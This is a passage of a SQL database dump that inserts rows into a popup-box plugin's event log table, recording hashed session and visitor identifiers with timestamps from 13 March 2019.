(69507, 'ea4fd819c1edd9a72a508eb2b7a3c836', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-13 16:25:48'),
(69508, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2019-03-13 16:26:14'),
(69509, 'ea4fd819c1edd9a72a508eb2b7a3c836', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-13 16:26:20'),
(69510, 'c33d027145d83318fdbda226fdd935ab', 'e68d3b2c8eec981c', 0, 2, 1, '2019-03-13 16:26:22'),
(69511, '56472957b355004c02f385ef8fe0bba5', 'b75bf757601d31d5', 0, 2, 1, '2019-03-13 16:26:36'),
(69512, 'ea4fd819c1edd9a72a508eb2b7a3c836', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-13 16:26:59'),
(69513, '3a09120b3a712d6e805f170f2bc2c960', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-13 16:28:42'),
(69514, '23dc152466ebc66f13ca81e8995f17a7', '1791b1aeb2327e22', 0, 2, 1, '2019-03-13 16:28:53'),
(69515, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 16:29:20'),
(69516, '834916321206a5a494ffc62c35f1f4d6', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-13 16:29:29'),
(69517, '1fce3db1dfc8c584082dcf4a6a2d76c7', '6b6728fbc481236a', 0, 2, 1, '2019-03-13 16:29:31'),
(69518, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 16:29:36'),
(69519, '834916321206a5a494ffc62c35f1f4d6', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-13 16:29:38'),
(69520, '834916321206a5a494ffc62c35f1f4d6', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-13 16:30:05'),
(69521, 'eb1fdece6c1b23dc6cc6cbdecdcdbbe7', '2ec78c2f5c8cdffa', 0, 2, 1, '2019-03-13 16:34:03'),
(69522, 'eb1fdece6c1b23dc6cc6cbdecdcdbbe7', '2ec78c2f5c8cdffa', 0, 2, 1, '2019-03-13 16:34:33'),
(69523, '48b5eea1e4c705627cab6f01750b04d8', 'ee15d3d6defea2e0', 0, 2, 1, '2019-03-13 16:38:22'),
(69524, 'ccc1425828008de2108789727844f753', '9c7642b57afc75c3', 0, 2, 1, '2019-03-13 16:40:14'),
(69525, '3a09120b3a712d6e805f170f2bc2c960', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-13 16:40:49'),
(69526, '2fe069c205f486f6174058bb4c666906', '32b169e936bbe5df', 0, 2, 1, '2019-03-13 16:40:50'),
(69527, '48b5eea1e4c705627cab6f01750b04d8', 'ee15d3d6defea2e0', 0, 2, 1, '2019-03-13 16:40:51');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(69528, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 16:42:11'),
(69529, '2fe069c205f486f6174058bb4c666906', '32b169e936bbe5df', 0, 2, 1, '2019-03-13 16:42:21'),
(69530, '5c87af24a784637606387c8281a78a56', '20683e7ff6f02d30', 0, 2, 1, '2019-03-13 16:42:39'),
(69531, '023dff9081d970550c7d08fc268b3ff6', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-13 16:43:01'),
(69532, '5c87af24a784637606387c8281a78a56', '20683e7ff6f02d30', 0, 2, 1, '2019-03-13 16:43:31'),
(69533, 'a10b99b80bc0f117d4573f452875be28', 'd637ff6963a69ff7', 0, 2, 1, '2019-03-13 16:46:01'),
(69534, '87bc72d123e85df10c3cecd58ee4efaf', '175b72b9380c40ec', 0, 2, 1, '2019-03-13 16:48:06'),
(69535, 'e06155ea0fd334b1ec1300f03478ead5', 'ae2d253e3105fd55', 0, 2, 1, '2019-03-13 16:48:11'),
(69536, 'fad007cdb359308bc3d63419080da253', '14a2850458962115', 0, 2, 1, '2019-03-13 16:48:21'),
(69537, 'fad007cdb359308bc3d63419080da253', '14a2850458962115', 0, 2, 1, '2019-03-13 16:48:56'),
(69538, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 16:49:38'),
(69539, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 16:49:52'),
(69540, '0e0f04f579fe362414a7c49dd05a4dc6', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-13 16:50:17'),
(69541, '0e0f04f579fe362414a7c49dd05a4dc6', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-13 16:50:27'),
(69542, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 16:50:31'),
(69543, 'ea4fd819c1edd9a72a508eb2b7a3c836', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-13 16:50:43'),
(69544, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 16:51:47'),
(69545, '3ee738ca5405e350be69e02e8fac4640', 'c2f4fbfba81c4858', 0, 2, 1, '2019-03-13 16:52:17'),
(69546, '1e6a5992644d809522e4224063422b22', 'bd882420bca652e2', 0, 2, 1, '2019-03-13 16:53:50'),
(69547, '1e6a5992644d809522e4224063422b22', 'bd882420bca652e2', 0, 2, 1, '2019-03-13 16:53:59'),
(69548, '1e6a5992644d809522e4224063422b22', 'bd882420bca652e2', 0, 2, 1, '2019-03-13 16:54:05'),
(69549, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 16:54:11'),
(69550, '4ed21e65e5d1e879e3bad1775d3f1456', '383293cc94e3d9f0', 0, 2, 1, '2019-03-13 16:54:56'),
(69551, '085d45a020a76be4e424740eaecc11c9', 'edfe950d47379572', 0, 2, 1, '2019-03-13 16:55:00'),
(69552, '64d37b7c876403b54df927a2e52fe1d3', 'c7d4ce8b0de12339', 0, 2, 1, '2019-03-13 16:55:15'),
(69553, '023dff9081d970550c7d08fc268b3ff6', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-13 16:55:28'),
(69554, '023dff9081d970550c7d08fc268b3ff6', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-13 16:55:40'),
(69555, '4ed21e65e5d1e879e3bad1775d3f1456', '383293cc94e3d9f0', 0, 2, 1, '2019-03-13 16:56:31'),
(69556, 'ec1c8455ddb98f0248fb501e62a9b466', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-13 16:56:48'),
(69557, '3ee738ca5405e350be69e02e8fac4640', 'c2f4fbfba81c4858', 0, 2, 1, '2019-03-13 16:56:51'),
(69558, 'ec1c8455ddb98f0248fb501e62a9b466', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-13 16:57:28'),
(69559, '702e90021453d979b175da8a069f90df', '407198c79af506a8', 0, 2, 1, '2019-03-13 16:59:52'),
(69560, 'a2e58d92b3b2154cd719662ffdc24a18', 'ec1b582974109f3e', 0, 2, 1, '2019-03-13 17:00:03'),
(69561, '58544f08de83e214d15d6445efd52d41', '7c5bcf99f2070582', 0, 2, 1, '2019-03-13 17:00:08'),
(69562, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2019-03-13 17:00:33'),
(69563, '70df987bc3e46ce4fb2b0dc62e0c1e3d', '2d28fe9d69afc198', 0, 2, 1, '2019-03-13 17:00:36'),
(69564, '0e0f04f579fe362414a7c49dd05a4dc6', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-13 17:00:50'),
(69565, '70df987bc3e46ce4fb2b0dc62e0c1e3d', '2d28fe9d69afc198', 0, 2, 1, '2019-03-13 17:00:55'),
(69566, '70df987bc3e46ce4fb2b0dc62e0c1e3d', '2d28fe9d69afc198', 0, 2, 1, '2019-03-13 17:01:19'),
(69567, 'a2e58d92b3b2154cd719662ffdc24a18', 'ec1b582974109f3e', 0, 2, 1, '2019-03-13 17:01:41'),
(69568, 'e06155ea0fd334b1ec1300f03478ead5', 'ae2d253e3105fd55', 0, 2, 1, '2019-03-13 17:02:44'),
(69569, '2791ea407c238d447b875bf6cde2c958', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-13 17:02:51'),
(69570, '834916321206a5a494ffc62c35f1f4d6', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-13 17:03:08'),
(69571, 'e06155ea0fd334b1ec1300f03478ead5', 'ae2d253e3105fd55', 0, 2, 1, '2019-03-13 17:03:39'),
(69572, 'ef6a845d73f40cbe2f2ecf6105bef20f', 'f1fc193e42194328', 0, 2, 1, '2019-03-13 17:04:22'),
(69573, 'e06155ea0fd334b1ec1300f03478ead5', 'ae2d253e3105fd55', 0, 2, 1, '2019-03-13 17:04:23'),
(69574, 'ef6a845d73f40cbe2f2ecf6105bef20f', 'f1fc193e42194328', 0, 2, 1, '2019-03-13 17:04:37'),
(69575, 'ef6a845d73f40cbe2f2ecf6105bef20f', 'f1fc193e42194328', 0, 2, 1, '2019-03-13 17:05:03'),
(69576, 'ef6a845d73f40cbe2f2ecf6105bef20f', 'f1fc193e42194328', 0, 2, 1, '2019-03-13 17:05:20'),
(69577, '6262006bee8f9faa58c381d9b43b393d', 'ef33699b366746ed', 0, 2, 1, '2019-03-13 17:06:15'),
(69578, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-03-13 17:06:50'),
(69579, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-13 17:09:21'),
(69580, '47977eb2278e4800c92b1296bc14c661', 'c423a976f7958be7', 0, 2, 1, '2019-03-13 17:09:23'),
(69581, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-13 17:09:44'),
(69582, '0605706f92cbe190ca58106b0e0d5599', '4574603cf07e6399', 0, 2, 1, '2019-03-13 17:09:46'),
(69583, '59870cf7bd6675bb386e78c31a96f884', '841bb192fc2f2409', 0, 2, 1, '2019-03-13 17:10:34'),
(69584, '3a09120b3a712d6e805f170f2bc2c960', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-13 17:10:51'),
(69585, '3a09120b3a712d6e805f170f2bc2c960', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-13 17:10:54'),
(69586, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-13 17:12:04'),
(69587, '330eeb00674dbdbe5e1391234ceab0bf', '842338ffd6eb10b7', 0, 2, 1, '2019-03-13 17:12:46'),
(69588, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 17:13:15'),
(69589, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 17:13:29'),
(69590, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 17:13:52'),
(69591, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 17:14:18'),
(69592, '0605706f92cbe190ca58106b0e0d5599', '4574603cf07e6399', 0, 2, 1, '2019-03-13 17:16:28'),
(69593, 'd6e5bf3e00d503bac675c3722fa840cb', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 17:18:34'),
(69594, 'b2f558eaa58a43f9c361fd5bac8296cd', '68e262710bf07c1c', 0, 2, 1, '2019-03-13 17:20:44'),
(69595, 'b2f558eaa58a43f9c361fd5bac8296cd', '68e262710bf07c1c', 0, 2, 1, '2019-03-13 17:22:48'),
(69596, '2f03028ea7cdb6f1fbe9247b54520515', '0509c55889e6c4ba', 0, 2, 1, '2019-03-13 17:23:31'),
(69597, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 17:23:33'),
(69598, '8b35a870ba5e0cff3ec59ccb50b46413', '509cf63412818a64', 0, 2, 1, '2019-03-13 17:24:25'),
(69599, '8b35a870ba5e0cff3ec59ccb50b46413', '509cf63412818a64', 0, 2, 1, '2019-03-13 17:24:39'),
(69600, '511c6ec9a639ef4a3baf3eddf852ddda', 'f10990f26adcd1c5', 0, 2, 1, '2019-03-13 17:26:06'),
(69601, '6fa77f34931892e468b0b04d3f037302', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-13 17:29:07'),
(69602, '6fa77f34931892e468b0b04d3f037302', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-13 17:29:20'),
(69603, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-03-13 17:31:47'),
(69604, '261295071981c33e6203737938c597bc', '9c3df594c5b16ce8', 0, 2, 1, '2019-03-13 17:31:53'),
(69605, '6fa77f34931892e468b0b04d3f037302', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-13 17:32:24'),
(69606, '6fa77f34931892e468b0b04d3f037302', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-13 17:32:47'),
(69607, '6fa77f34931892e468b0b04d3f037302', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-13 17:32:57'),
(69608, '1993071209f04a8ccd5b5aa763236b3d', '8e9a16956483f85e', 0, 2, 1, '2019-03-13 17:33:03'),
(69609, '261295071981c33e6203737938c597bc', '9c3df594c5b16ce8', 0, 2, 1, '2019-03-13 17:33:05'),
(69610, '261295071981c33e6203737938c597bc', '9c3df594c5b16ce8', 0, 2, 1, '2019-03-13 17:33:10'),
(69611, '6fa77f34931892e468b0b04d3f037302', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-13 17:33:42'),
(69612, '3a09120b3a712d6e805f170f2bc2c960', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-13 17:34:34'),
(69613, 'ec1c8455ddb98f0248fb501e62a9b466', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-13 17:35:21'),
(69614, '1834eca10e75a2c9fc8c1a26201076c2', '0611035341fa8332', 0, 2, 1, '2019-03-13 17:36:43'),
(69615, 'cd1874e900545da4c6a2873d8173ed04', '68e262710bf07c1c', 0, 2, 1, '2019-03-13 17:37:05'),
(69616, 'ec1c8455ddb98f0248fb501e62a9b466', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-13 17:38:26'),
(69617, 'f01479d0a577e930ee8365549db858b7', '51597bf7a3572f16', 0, 2, 1, '2019-03-13 17:39:27'),
(69618, '7d8f0c772a7519b1d60d10d523075917', '4dca797f4c8a12c2', 0, 2, 1, '2019-03-13 17:39:37'),
(69619, 'c6c7150dfb38f9f5d2683d8863d0969e', '22e6d92b989b9f8f', 0, 2, 1, '2019-03-13 17:39:51'),
(69620, 'c6c7150dfb38f9f5d2683d8863d0969e', '22e6d92b989b9f8f', 0, 2, 1, '2019-03-13 17:40:09'),
(69621, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 17:41:46'),
(69622, '3a09120b3a712d6e805f170f2bc2c960', '65fb1a08fe2b5aab', 0, 2, 1, '2019-03-13 17:48:08'),
(69623, 'ec536aeb3893f8363fc867dbc8f5b3c4', '854dd24b6beb7284', 0, 2, 1, '2019-03-13 17:48:47'),
(69624, 'd6e5bf3e00d503bac675c3722fa840cb', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 17:49:01'),
(69625, '4f934af207dae5dddea5a16784a6f036', 'cd8553d975b699b4', 0, 2, 1, '2019-03-13 17:50:08'),
(69626, 'ecea826bd91d08129d5b5263993f17fe', '1791b1aeb2327e22', 0, 2, 1, '2019-03-13 17:50:42'),
(69627, '469a16fcd35f2d5a19eccb846d6a3e3c', '798d56d8d5e68e06', 0, 2, 1, '2019-03-13 17:50:56'),
(69628, 'd3b5d6d86daec6c4c30cb24d466917dd', 'f69214bd1249660d', 0, 2, 1, '2019-03-13 17:51:01'),
(69629, '261295071981c33e6203737938c597bc', '9c3df594c5b16ce8', 0, 2, 1, '2019-03-13 17:51:44'),
(69630, '261295071981c33e6203737938c597bc', '9c3df594c5b16ce8', 0, 2, 1, '2019-03-13 17:51:58'),
(69631, '469a16fcd35f2d5a19eccb846d6a3e3c', '798d56d8d5e68e06', 0, 2, 1, '2019-03-13 17:53:00'),
(69632, '0605706f92cbe190ca58106b0e0d5599', '4574603cf07e6399', 0, 2, 1, '2019-03-13 17:53:02'),
(69633, 'f697dce6ffd26c98e10adefb5d659953', 'fccb63434ab0d7c5', 0, 2, 1, '2019-03-13 17:53:02'),
(69634, 'f697dce6ffd26c98e10adefb5d659953', 'fccb63434ab0d7c5', 0, 2, 1, '2019-03-13 17:53:30'),
(69635, '50d6376c388593c2a283e22af0bed1f4', '9c7642b57afc75c3', 0, 2, 1, '2019-03-13 17:54:00'),
(69636, '6bca6b1fcf029da73db711445848e7b0', '3c4a917ad317985a', 0, 2, 1, '2019-03-13 17:54:01'),
(69637, '6bca6b1fcf029da73db711445848e7b0', '3c4a917ad317985a', 0, 2, 1, '2019-03-13 17:54:15'),
(69638, '0d580ffb2894fc1c4954e3dac642a367', '813518eddc998d16', 0, 2, 1, '2019-03-13 17:54:34'),
(69639, 'b23bebab62fd31cee7f8699ae1ed9f22', 'c69b16a8ac60521f', 0, 2, 1, '2019-03-13 17:55:34'),
(69640, 'cd1874e900545da4c6a2873d8173ed04', '68e262710bf07c1c', 0, 2, 1, '2019-03-13 17:56:14'),
(69641, '355a1c2e15b4ee0362d8e24cc2cbce4c', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 17:58:44'),
(69642, '355a1c2e15b4ee0362d8e24cc2cbce4c', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 17:59:19'),
(69643, 'a46280a70abd246734aafbc2764235e4', 'c2f4fbfba81c4858', 0, 2, 1, '2019-03-13 18:01:20'),
(69644, 'bfd6728b19892de424ebac5bf608707f', '93333b8b90202e06', 0, 2, 1, '2019-03-13 18:02:05'),
(69645, 'ffac1ba1eb17181e893dc6a75091b484', '624d6937076d1188', 0, 2, 1, '2019-03-13 18:03:18'),
(69646, 'd3dd1e3583c80bce6ac73015d6ba8630', '033f4c4880b31409', 0, 2, 1, '2019-03-13 18:04:30'),
(69647, '868f9a4649a596550788b2fcfe8d7c15', '70e4f01a7b97992e', 0, 2, 1, '2019-03-13 18:06:01'),
(69648, 'f84e4a364f704c650fbe81712a2238ee', 'f60664bc0eec984b', 0, 2, 1, '2019-03-13 18:06:06'),
(69649, 'ef6a845d73f40cbe2f2ecf6105bef20f', 'f1fc193e42194328', 0, 2, 1, '2019-03-13 18:07:05'),
(69650, 'c01cbf29aaee6a4fe2095079a19743a9', '833f77358793c521', 0, 2, 1, '2019-03-13 18:07:17'),
(69651, '324eb62efe8068491fab9dc6be1b2f29', 'd982869195a81c84', 0, 2, 1, '2019-03-13 18:07:55'),
(69652, '6bca6b1fcf029da73db711445848e7b0', '3c4a917ad317985a', 0, 2, 1, '2019-03-13 18:09:46'),
(69653, '6bca6b1fcf029da73db711445848e7b0', '3c4a917ad317985a', 0, 2, 1, '2019-03-13 18:10:06'),
(69654, '2e26a3bbf700ad9f775615dd02fc0f1e', 'd7036fef56eff751', 0, 2, 1, '2019-03-13 18:11:26'),
(69655, 'b6ae1ad00a6da34a44ed9f8740b41a95', '2ea7201b0e939b00', 0, 2, 1, '2019-03-13 18:11:49'),
(69656, 'd2b5a127b83fe4d25fb824301a590c26', '332723ec6654d9f5', 0, 2, 1, '2019-03-13 18:12:24'),
(69657, '823f7a982c50f9f61986caf7b45aee34', '19e548dd12d40585', 0, 2, 1, '2019-03-13 18:14:04'),
(69658, '94b10fdd936f4ec243498721ba96eb03', 'a639f655bef0fc87', 0, 2, 1, '2019-03-13 18:14:33'),
(69659, '041edf519f5a19d99c55e324cb753227', '480c7522576f02e7', 0, 2, 1, '2019-03-13 18:16:47'),
(69660, '94b10fdd936f4ec243498721ba96eb03', 'a639f655bef0fc87', 0, 2, 1, '2019-03-13 18:17:56'),
(69661, '168c6ff10ae942251af8853e4739c965', 'f10990f26adcd1c5', 0, 2, 1, '2019-03-13 18:27:41'),
(69662, '168c6ff10ae942251af8853e4739c965', 'f10990f26adcd1c5', 0, 2, 1, '2019-03-13 18:27:43'),
(69663, 'e4450f9b279421b6c312ae9760ed72f3', 'ee15d3d6defea2e0', 0, 2, 1, '2019-03-13 18:30:15'),
(69664, 'a46280a70abd246734aafbc2764235e4', 'c2f4fbfba81c4858', 0, 2, 1, '2019-03-13 18:31:55'),
(69665, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 18:32:06'),
(69666, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-13 18:32:12'),
(69667, 'a2a94d263cede0609dc1c1c55a020b48', '1c68b977b911188c', 0, 2, 1, '2019-03-13 18:32:22'),
(69668, '823f7a982c50f9f61986caf7b45aee34', '19e548dd12d40585', 0, 2, 1, '2019-03-13 18:32:34'),
(69669, '355a1c2e15b4ee0362d8e24cc2cbce4c', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 18:32:34'),
(69670, 'fa58cdeb6341aab3a3e3f1b2dcd4fe27', '0f82ee3c80278677', 0, 2, 1, '2019-03-13 18:32:39'),
(69671, '0c8301e63894c43b030f7bdbd7643995', '503a514a8daa32a7', 0, 2, 1, '2019-03-13 18:32:40'),
(69672, '174b13f503352b38ab8e32b0ee47c0bc', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-13 18:32:43'),
(69673, 'e4450f9b279421b6c312ae9760ed72f3', 'ee15d3d6defea2e0', 0, 2, 1, '2019-03-13 18:32:47'),
(69674, 'a2a94d263cede0609dc1c1c55a020b48', '1c68b977b911188c', 0, 2, 1, '2019-03-13 18:32:49'),
(69675, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-13 18:32:53'),
(69676, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 18:33:02'),
(69677, 'a2a94d263cede0609dc1c1c55a020b48', '1c68b977b911188c', 0, 2, 1, '2019-03-13 18:33:10'),
(69678, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-13 18:33:12'),
(69679, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2019-03-13 18:33:14'),
(69680, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 18:33:15'),
(69681, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-13 18:33:17'),
(69682, 'fa58cdeb6341aab3a3e3f1b2dcd4fe27', '0f82ee3c80278677', 0, 2, 1, '2019-03-13 18:33:20'),
(69683, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 18:33:29'),
(69684, '91c93b149902513645cefead6c1deaa3', 'df2f194cea195593', 0, 2, 1, '2019-03-13 18:33:31'),
(69685, 'a2a94d263cede0609dc1c1c55a020b48', '1c68b977b911188c', 0, 2, 1, '2019-03-13 18:33:31'),
(69686, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 18:33:47'),
(69687, 'a2a94d263cede0609dc1c1c55a020b48', '1c68b977b911188c', 0, 2, 1, '2019-03-13 18:33:50'),
(69688, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2019-03-13 18:33:56'),
(69689, '355a1c2e15b4ee0362d8e24cc2cbce4c', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 18:33:57'),
(69690, '355a1c2e15b4ee0362d8e24cc2cbce4c', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 18:34:06'),
(69691, '556c99886b51b0485765914a35e70f51', '1624785298a8447a', 0, 2, 1, '2019-03-13 18:34:11'),
(69692, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 18:34:17'),
(69693, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-03-13 18:34:21'),
(69694, '023dff9081d970550c7d08fc268b3ff6', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-13 18:34:24'),
(69695, '12dacaee0c7a5622a06c63089f03cd79', 'ee15d3d6defea2e0', 0, 2, 1, '2019-03-13 18:34:30'),
(69696, 'a2a94d263cede0609dc1c1c55a020b48', '1c68b977b911188c', 0, 2, 1, '2019-03-13 18:34:32'),
(69697, 'fa58cdeb6341aab3a3e3f1b2dcd4fe27', '0f82ee3c80278677', 0, 2, 1, '2019-03-13 18:34:40'),
(69698, '023dff9081d970550c7d08fc268b3ff6', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-13 18:34:41'),
(69699, 'a46280a70abd246734aafbc2764235e4', 'c2f4fbfba81c4858', 0, 2, 1, '2019-03-13 18:34:45'),
(69700, '355a1c2e15b4ee0362d8e24cc2cbce4c', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 18:34:52'),
(69701, '556c99886b51b0485765914a35e70f51', '1624785298a8447a', 0, 2, 1, '2019-03-13 18:35:03'),
(69702, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 18:35:04'),
(69703, '12dacaee0c7a5622a06c63089f03cd79', 'ee15d3d6defea2e0', 0, 2, 1, '2019-03-13 18:35:18'),
(69704, 'a2a94d263cede0609dc1c1c55a020b48', '1c68b977b911188c', 0, 2, 1, '2019-03-13 18:35:19'),
(69705, '355a1c2e15b4ee0362d8e24cc2cbce4c', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 18:35:20'),
(69706, '2fe069c205f486f6174058bb4c666906', '32b169e936bbe5df', 0, 2, 1, '2019-03-13 18:35:25'),
(69707, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-03-13 18:35:46'),
(69708, 'fa58cdeb6341aab3a3e3f1b2dcd4fe27', '0f82ee3c80278677', 0, 2, 1, '2019-03-13 18:35:55'),
(69709, '174b13f503352b38ab8e32b0ee47c0bc', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-13 18:35:57'),
(69710, '355a1c2e15b4ee0362d8e24cc2cbce4c', '1de090ec808c88cc', 0, 2, 1, '2019-03-13 18:35:59'),
(69711, '7f579047e5342b563c3154f797a4fa16', 'b75bf757601d31d5', 0, 2, 1, '2019-03-13 18:36:02'),
(69712, 'f697dce6ffd26c98e10adefb5d659953', 'fccb63434ab0d7c5', 0, 2, 1, '2019-03-13 18:36:02'),
(69713, '236b72a21e53aa4d429d0cea7e724239', '72d6326cc3417ddf', 0, 2, 1, '2019-03-13 18:36:22'),
(69714, 'a18c9920436f9f4888e50baa236cd26d', '595cd9bc5ec172c1', 0, 2, 1, '2019-03-13 18:36:29'),
(69715, 'a46280a70abd246734aafbc2764235e4', 'c2f4fbfba81c4858', 0, 2, 1, '2019-03-13 18:36:47'),
(69716, 'a7dd8d508dd6b060153d0c2c0670bc34', '2034f09284a4c7ca', 0, 2, 1, '2019-03-13 18:37:02'),
(69717, '0c8301e63894c43b030f7bdbd7643995', '503a514a8daa32a7', 0, 2, 1, '2019-03-13 18:37:40'),
(69718, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-13 18:37:51'),
(69719, '4c6a4739e38d9fdc598156dd1c9ab2f3', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-13 18:38:14'),
(69720, 'a173689a4e56525a635344ad5f19dfb0', '3233431a244017cd', 0, 2, 1, '2019-03-13 18:38:58'),
(69721, 'a173689a4e56525a635344ad5f19dfb0', '3233431a244017cd', 0, 2, 1, '2019-03-13 18:41:08'),
(69722, '8dda5b95db2e0ace1a9dff40320d973a', 'fae51c31b385b3e8', 0, 2, 1, '2019-03-13 18:41:49'),
(69723, '8403e5b8847daefefe936c6ff97ac5fa', 'c708ea201ca66e50', 0, 2, 1, '2019-03-13 18:41:57'),
(69724, '7d8f0c772a7519b1d60d10d523075917', '4dca797f4c8a12c2', 0, 2, 1, '2019-03-13 18:45:38'),
(69725, 'a18c9920436f9f4888e50baa236cd26d', '595cd9bc5ec172c1', 0, 2, 1, '2019-03-13 18:45:40'),
(69726, '8403e5b8847daefefe936c6ff97ac5fa', 'c708ea201ca66e50', 0, 2, 1, '2019-03-13 18:45:53'),
(69727, 'a18c9920436f9f4888e50baa236cd26d', '595cd9bc5ec172c1', 0, 2, 1, '2019-03-13 18:46:00'),
(69728, 'fa58cdeb6341aab3a3e3f1b2dcd4fe27', '0f82ee3c80278677', 0, 2, 1, '2019-03-13 18:46:02'),
(69729, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 18:46:05'),
(69730, 'a2a94d263cede0609dc1c1c55a020b48', '1c68b977b911188c', 0, 2, 1, '2019-03-13 18:46:06'),
(69731, '2fe069c205f486f6174058bb4c666906', '32b169e936bbe5df', 0, 2, 1, '2019-03-13 18:46:17'),
(69732, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-13 18:46:18'),
(69733, '64e268ff0e9677075df68b867addd92a', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-13 18:46:22'),
(69734, 'fa58cdeb6341aab3a3e3f1b2dcd4fe27', '0f82ee3c80278677', 0, 2, 1, '2019-03-13 18:46:22'),
(69735, 'a18c9920436f9f4888e50baa236cd26d', '595cd9bc5ec172c1', 0, 2, 1, '2019-03-13 18:46:25'),
